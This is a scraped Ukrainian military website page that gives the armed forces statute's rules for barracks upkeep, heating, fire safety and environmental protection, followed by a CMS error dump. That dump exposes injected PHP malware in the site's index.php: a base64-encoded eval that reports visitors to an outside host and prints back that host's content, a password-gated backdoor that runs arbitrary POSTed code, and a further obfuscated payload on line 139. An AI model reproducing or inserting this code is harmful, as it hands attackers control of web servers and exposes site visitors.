Порядок розміщення військовослужбовців в казармах.

Український легіон » Дисципліни » Статут ЗСУ » Порядок розміщення військовослужбовців в казармах.

Військовослужбовці Збройних Сил України, якими можуть бути лише громадяни України, мають права й свободи громадян України з урахуванням особливостей, що визначаються Конституцією України, законами України з військових питань, військовими статутами Збройних Сил України та іншими нормативно-правовими актами. На військовослужбовців покладаються обов'язки, що визначаються військовими статутами та порадниками Збройних Сил України.

Кожний військовослужбовець має військове звання відповідно до Закону України «Про загальний військовий обов'язок і військову службу». Військові звання поділяються на армійські та корабельні згідно з додатком 3 до цього Статуту.

1. Утримання приміщень.

Усі будівлі й приміщення, а також територія військової частини повинні завжди утримуватися в чис­тоті та порядку. Кожен начальник відповідає за пра­вильне використання будівель і приміщень, збереження обладнання, інвентарю, меблів і засобів пожежогасіння, а також за переведення будівель і споруд на режим весняно-літньої та осінньо-зимової експлуатації.

Усі приміщення та фасади будівель мають бути пофарбовані у визначений колір.

Усі кімнати мають бути пронумеровані. На зов­нішній стороні вхідних дверей кожної кімнати виві­шується табличка із зазначенням номера кімнати та її призначення, а всередині кожної кімнати на стіні — опис наявного в ній майна: меблів, інвентарю й облад­нання (згідно з додатком 16 до цього Статуту).

Меблі, інвентар та обладнання приміщення ну­меруються і записуються до книги обліку, яка збері­гається у старшини роти, а вогнегасники реєструються начальником пожежної служби частини.

Меблі, інвентар та обладнання закріплюються за приміщенням і без дозволу командира військової частини не можуть переноситися з приміщення одного під­розділу до іншого. Переносити меблі, обладнання та ін­вентар з приміщення однієї військової частини до іншої заборонено.

У спальних приміщеннях для особового складу або в інших приміщеннях на видному місці повинні ви­вішуватися на спеціальних щитах розпорядок дня, роз­клад занять, листки нарядів, опис майна і необхідні інструкції.

Вивішені в кімнатах (приміщеннях) картини, плака­ти та інші наочні посібники мають бути в рамках. На вікнах дозволяється вивішувати однотонні фіранки чи штори. У приміщеннях дозволяється тримати квіти.

Шибки у вікнах нижніх поверхів, що виходять на міські вулиці, до визначеної висоти мають бути мато­ві, а вікна — обладнані ґратами.

Вхідні двері до казарми за потреби обладнуються оглядовим вічком, надійним засувом зсередини і звуко­вою сигналізацією з виведенням до днювального підроз­ділу.

У всіх приміщеннях, що мають водопровід, для пиття води обладнуються фонтанчики, а в приміщеннях, де немає водопроводу, встановлюються закриті на за­мок бачки з питною водою, які також обладнуються фонтанчиками. Бачки щоденно під наглядом чергового роти прополіскуються і поповнюються свіжою питною водою. Один раз на тиждень здійснюється їх дезінфек­ція. Ключі від бачків зберігаються у чергового роти.

Усі приміщення забезпечуються достатньою кількістю урн для сміття, а місця для куріння — урна­ми з водою.

Біля зовнішніх входів до приміщень встановлюються пристосування для очищення взуття від бруду та урни для сміття.

Приміщення щоденно прибираються черговими прибиральниками під безпосереднім наглядом чергового роти. Від занять чергові прибиральники не звільняються. Чергові прибиральники повинні вимести сміття з-під .ліжок і тумбочок, підмести в проходах між рядами лі­жок, протерти підлогу щіткою чи вологою ганчіркою, винести сміття в призначене місце, витерти пил з вікон, дверей, тумбочок, ставниць, шаф та інших предметів, ви­чистити урни, а в місцях для куріння, крім того, налити в урни воду чи дезінфікувальну речовину.

Чистота приміщень під час занять підтримується днювальними.

Крім щоденного прибирання, один раз на тиждень прибираються всі приміщення під керівництвом старши­ни роти. Під час такого прибирання вся постіль (мат­раци, подушки, простирадла, ковдри) виноситься з приміщень, старанно вибивається і провітрюється. Перед натиранням мастикою підлога старанно очищається від бруду й витирається вологою ганчіркою.

Якщо підлога не натирається мастикою, її миють не менше ніж один раз на тиждень. Мити підлогу, обливаючи водою чи легкозаймистими рідинами й нафтопро­дуктами, забороняється.У їдальнях і пекарнях усе обладнання та інвен­тар утримують у чистоті та порядку; посуд після вико­ристання старанно миють, ошпарюють окропом, вису­шують і зберігають на стелажах чи у спеціальних ша­фах.

Узимку вікна на даху будівель зачиняються, а влітку відчиняються, але захищаються спеціальними ґратами.

На горищах, у віддалених від димарів місцях, дозво­ляється зберігати зимові віконні рами.

Горища, підвали та сушарні замикаються, запеча­туються, ключі від них зберігаються у чергового того підрозділу, на який покладено утримання цих примі­щень.

Туалети обладнуються з розрахунку одна кабіна з унітазом (очком) та один пісуар на 10—12 осіб. Туалети слід утримувати в чистоті, своєчасно дезінфіку-вати, забезпечувати їх вентиляцію та освітлення. Наг­ляд за їх утриманням покладається на старшин підроз­ділів, санітарних інструкторів і чергових рот. Інвентар для їх прибирання зберігається у спеціально визначено­му місці (шафі).

Зовнішні туалети влаштовуються з водонепроникни­ми вигрібними ямами не ближче 100 м від жилих при­міщень, їдалень і пекарень. Доріжки до зовнішніх туа­летів уночі освітлюються.

Перепланування приміщень, перенесення і розбирання існуючих і спорудження нових будівель, прокладення внутрішніх електромереж, ліній зв'язку, сиг­налізації та входів телевізійних антен, встановлення тимчасових і побудова нових печей без дозволу квар­тирно-експлуатаційних органів і органів пожежної охо­рони забороняється.

Ремонт обладнання, електричних, газових ме­реж та центрального опалення, проведення газоелектрозварювальних робіт особами, які не мають спеціальної підготовки й дозволу на виконання цих робіт, забороняється.

Ходити строєм в ногу в казармі заборонено.

Район розташування військової частини, тери­торія військового містечка й прилеглі до нього вулиці мають бути озеленені, утримуватися в чистоті та поряд­ку, а з настанням темряви освітлюватися. Територія військового містечка огороджується.Район розташування військової частини для прибирання розподіляється на ділянки між підрозділами. Сміття збирається у контейнери, які закриваються криш­ками, і регулярно вивозиться.

Контейнери встановлюються на майданчику з твердим покриттям. Не рідше ніж один раз на тиждень кон­тейнери очищаються і дезінфікуються.

Прибирання території військового містечка проводиться силами добового наряду і виділеними командами у післяобідній час.

 

2. Опалення приміщень.

Початок і кінець опалювального періоду оголо­шується наказом начальника гарнізону. Всі котельні, системи центрального опалення, печі й димарі до по­чатку опалювального сезону старанно перевіряються, а несправні — ремонтуються, димарі очищаються у ви­значені строки. При пічному опаленні порядок і час опа­лення приміщень, приймання й видачі палива встанов­люються командиром військової частини.

Опалення закінчується не пізніше ніж за дві година до відбою. У навчальних і службових приміщеннях опа­лення проводиться вранці і закінчується за годину до початку занять (робіт). У сильні морози й у дні, визна­чені для миття підлоги, опалення печей проводиться двічі на добу.

На опалювальний період наказом по військовій частині призначаються опалювачі, які попередньо ви­вчають правила опалення та пожежної безпеки. Опалю­вачі від занять не звільняються. На опалювальний сезон вони звільняються від виконання всіх нарядів та робіт, не пов'язаних з опаленням приміщень.

Нагляд за пічним опаленням у підрозділах покла­дається на старшину й чергового роти, а в штабі час­тини — на чергового штабу частини.

Узимку в жилих приміщеннях підтримується темпе­ратура не нижче +18 °С, а в медичних установах—не нижче +20 °С. Термометри вивішуються у приміщеннях на внутрішніх стінах, подалі від печей та нагрівальних пристроїв на висоті 1,5 м від підлоги.

Користуватися несправними печами, застосовувати для розпалювання печей запалювальні рідини, залиша­ти без нагляду печі, що топляться, зберігати паливо в жилих приміщеннях, коридорах забороняється.

території, що прилягає до приміщення, та додержання правил пожежної безпеки.

Військовослужбовцям заборонено користуватися май­ном власників приміщень без їх дозволу.

У разі тимчасового розміщення в населеному пункті зброя та боєприпаси зберігаються в сухому, від­даленому від дверей, печей, обігрівальних приладів міс­ці та постійно охороняються добовим нарядом. Обмун­дирування і спорядження розміщуються у пристосова­них для цього місцях. Особисті речі та білизна зберігаються у речових мішках.

Інші вимоги, що стосуються внутрішнього поряд­ку й звільнення військовослужбовців строкової служби, слід виконувати за правилами, визначеними для розмі­щення в казармах.

 

3. Пожежна безпека.

Пожежна безпека в Збройних Силах України забезпечується здійсненням комплексу організаційних і технічних заходів, спрямованих на запобігання виник­ненню пожежі, та системою пожежного захисту.

Усі військовослужбовці повинні знати й виконувати вимоги пожежної безпеки (додаток 19 до цього Стату­ту) і вміти користуватися засобами пожежогасіння.

У разі виникнення пожежі військовослужбовець по­винен вжити заходів щодо виклику пожежного підрозді­лу та гасіння пожежі всіма наявними засобами, а також рятування людей, озброєння, бойової та іншої техніки і матеріальних засобів.

У кожній військовій частині розробляється план пожежної безпеки, який затверджується командиром військової частини та узгоджується з органами пожеж­ної охорони і доводиться до усіх посадових осіб. За­гальна інструкція щодо пожежної безпеки у військовій частині, використання сил та засобів для гасіння поже­жі, а також витяг з інструкції про порядок евакуації особового складу, бойової та іншої техніки і матеріаль­них засобів повинні бути у чергового частини.

Командир військової частини відповідає за стан пожежної безпеки та організацію пожежної охорони і зобов'язаний:

огрганізувати пожежну охорону, вивчення особовим складом вимог пожежної безпеки та навчання повод­женню під час гасіння пожежі; забезпечити в розташуванні частини нормативні за­паси води та наявність засобів пожежогасіння;

не менше ніж один раз на три місяці перевіряти стан пожежної безпеки та організацію пожежної охорони і не менше ніж двічі на рік проводити відпрацювання плану пожежної безпеки із залученням усіх необхідних сил та засобів;

забезпечити додержання протипожежних вимог, ви­значених стандартами, нормами і правилами, а також виконання вимог приписів пожежної безпеки;

налагодити телефонний зв'язок із найближчим під­розділом пожежної охорони гарнізону чи Міністерства внутрішніх справ України.

Заступник командира військової частини і на­чальник полігону відповідають за виконання вимог по­жежної безпеки на території, закріпленій за військовою частиною, полігоном, на навчальних об'єктах бойової підготовки.

Командири підрозділів, начальники служб, май­стерень, цехів, клубів, лабораторій та інших об'єктів відповідають за виконання вимог пожежної безпеки, в підпорядкованих їм підрозділах, службах, на об'єктах та за справний стан засобів пожежогасіння.

Виконанням робіт з пожежної безпеки військо­вої частини керує начальник служби пожежної безпеки або командир пожежного підрозділу, а там, де він не передбачений за штатом, його обов'язки покладаються на одного з офіцерів (прапорщиків) за сумісництвом.

У військовій частині, яка не має штатного пожежного підрозділу, створюється пожежна команда чи­сельністю від 5 до 18 осіб. До складу пожежної коман­ди включаються військовослужбовці рядового і сержант­ського складу, як правило, з одного підрозділу.

Від команди виділяється пожежний наряд, який забезпечує чергування на пожежних постах цілодобово чи протягом визначеного часу згідно з табелем постів, затвердженим командиром військової частини.

Офіцери, прапорщики органів пожежної охорони та особовий склад пожежних підрозділів військових час­тин звільняються від нарядів, не пов'язаних з виконан­ням завдань служби пожежної охорони.

Начальник служби пожежної безпеки військо­вої частини, командир пожежного підрозділу підпоряд­ковуються безпосередньо командирові військової частини, а із спеціальних питань керуються вказівками орга­ну пожежної охорони вищого рівня і відповідають за постійну готовність пожежного підрозділу, засобів по­жежогасіння, що знаходяться в пожежному підрозділі, та за навчання особового складу вимогам пожежної безпеки.

Начальник служби пожежної безпеки, командир (начальник) пожежного підрозділу зобов'язаний:

знати особливості стану пожежної безпеки об'єктів військової частини, брати участь у розробленні плану пожежної безпеки;

особисто проводити заняття з офіцерами, прапорщи­ками та старшинами підрозділів військової частини з пожежної безпеки, експлуатації засобів пожежогасін­ня, вести роз'яснювальну роботу серед особового складу щодо виконання вимог пожежної безпеки, а також про­водити спеціальну підготовку пожежного підрозділу й інструктувати пожежний наряд;

перевіряти додержання вимог пожежної безпеки на об'єктах і повсякденно контролювати виконання особо­вим складом встановлених вимог пожежної безпеки і несення служби пожежним нарядом;

стежити за справністю і правильною експлуатацією всіх засобів пожежогасіння, пожежної сигналізації, дже­рел пожежного водопостачання і вживати заходів щодо підтримання їх у постійній готовності до дії;

проводити облік технічного стану засобів пожежога­сіння;

забороняти експлуатацію окремих будівель, орендо­ваних приміщень, сховищ, майстерень та агрегатів, якщо їх використання може призвести до виникнення пожежі;

своєчасно доповідати командирові військової частини про порушення вимог пожежної безпеки на об'єктах та невиконання приписів органів пожежної охорони, а про всі випадки загорання, виникнення пожежі і вжиті за­ходи — негайно;

керувати гасінням пожежі.

 

4. Природокористування та охорона довкілля.

Командир військової частини відповідає за стан екологічної безпеки військової частини. Кожен військо­вослужбовець повинен дбати про раціональне користування природними ресурсами (природокористування) та охорону довкілля, утримуватися від дій, які можуть спричинити забруднення землі, водних ресурсів та по­вітря або заподіяти шкоду рослинному чи тваринному світові.

Для запобігання негативному впливові військ на довкілля у військовій частині щорічно складається план екологічного забезпечення, у якому відображаються за­ходи раціонального природокористування та охорони довкілля в пункті постійної дислокації, в районах роз­ташування, проведення занять, навчань, маневрів та на маршрутах пересування підрозділів (військ), а також заходи виховного та освітнього характеру з питань еко­логічної безпеки.

План доводиться до відома особового складу. Перевірка виконання зазначених заходів проводить­ся щомісяця.

Обов'язки щодо планування заходів екологічно­го забезпечення, організації та контролю за їх вико­нанням покладаються на начальника служби радіацій­ного, хімічного, біологічного захисту — начальника служби екологічної безпеки, а за відсутності цієї посади за штатом — на посадову особу, яка призначається на­казом командира військової частини.

Останні статті

Отримання дозволу на зброю
03.04.2015

Отримання дозволу на зброю

Перелік документів на придбання нарізної та гладкоствольної зброї
Детальніше
Гарнізонні заходи за участю військ.
28.05.2014

Гарнізонні заходи за участю військ.

Детальніше
MODx Content Manager »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert(): Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /sata2/home/users/ukrlegion/www/www.ukrlegion.com/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0,0168 s(22 Requests)
  PHP: 0,3071 s 
  Total: 0,3239 s